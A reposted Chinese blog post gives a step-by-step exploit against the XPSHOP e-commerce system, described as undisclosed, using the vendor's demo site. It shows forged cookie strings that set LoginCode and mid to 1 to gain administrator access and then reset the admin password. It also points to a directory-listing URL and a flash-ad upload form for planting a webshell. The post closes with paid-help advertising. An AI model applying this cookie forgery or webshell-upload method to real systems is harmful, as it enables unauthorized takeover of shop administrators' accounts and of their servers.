XPSHOP商城系統(tǒng)漏洞
[重要通告]如您遇疑難雜癥,本站支持知識付費(fèi)業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時(shí)間哦!
XPSHOP商城系統(tǒng)漏洞 本文轉(zhuǎn)載老康BLOG
無意中發(fā)現(xiàn)這個(gè)漏洞的..官方現(xiàn)在還不知道...我沒有在別處公布哦..
這個(gè)漏洞不好...要直拉改人家管理員密碼!!有點(diǎn)兒缺德!!!...
但為了我們的網(wǎng)絡(luò)更安全..還是看看吧...
首先先看看這個(gè)站吧:http://demo1.xpshop.cn/
先注冊一個(gè)用戶進(jìn)去..為了方便也為了不要那么垃圾賬戶在人家系統(tǒng)里.我這說一下我注冊好了的用戶名:wc1217 密碼:77423704
好..還是用啊D打開網(wǎng)站比較好..記得要保留cookies
之后便看看他的Cookies...
代碼:
LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14
我們改一下這兩個(gè)值:LoginCode=0684;mid=14 .......都改成1 :
代碼:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1點(diǎn)擊修改..后右鍵刷新看一下..要注意.不要刷得太快...不然就沒用了..
之后就OK了:
當(dāng)然..也有可能沒有..那我們就要改一下:"ASP.NET_SessionId=" 這個(gè)值就好了..隨便改一個(gè)字就行:如下:
代碼:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1好了..現(xiàn)在再看看會員信息:
是不是有一個(gè)"找回密碼答案:"呵.....個(gè)位都想到了吧..直接就能改管理員密碼了..
http://demo1.xpshop.cn/memberLostpass.aspx這個(gè)是改密碼的..
成功.....http://demo1.xpshop.cn/admin/default.aspx這里登錄后就是怎么拿WEBSHELL了..
可是我一直沒弄成..理論是只有這樣才行..看..
先插馬..再備份..但這里出錯(cuò)了..
還望達(dá)人能想出更好的辦法..
我想了一晚上了....沒轍了....
http://demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 這可以列目錄
好..就那么多了
http://demo1.xpshop.cn/helps/t.txt
添加flash廣告處可直接上傳馬
營銷管理 - flash廣告添加
問題未解決?付費(fèi)解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信
所寫所說,是心之所感,思之所悟,行之所得;文當(dāng)無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!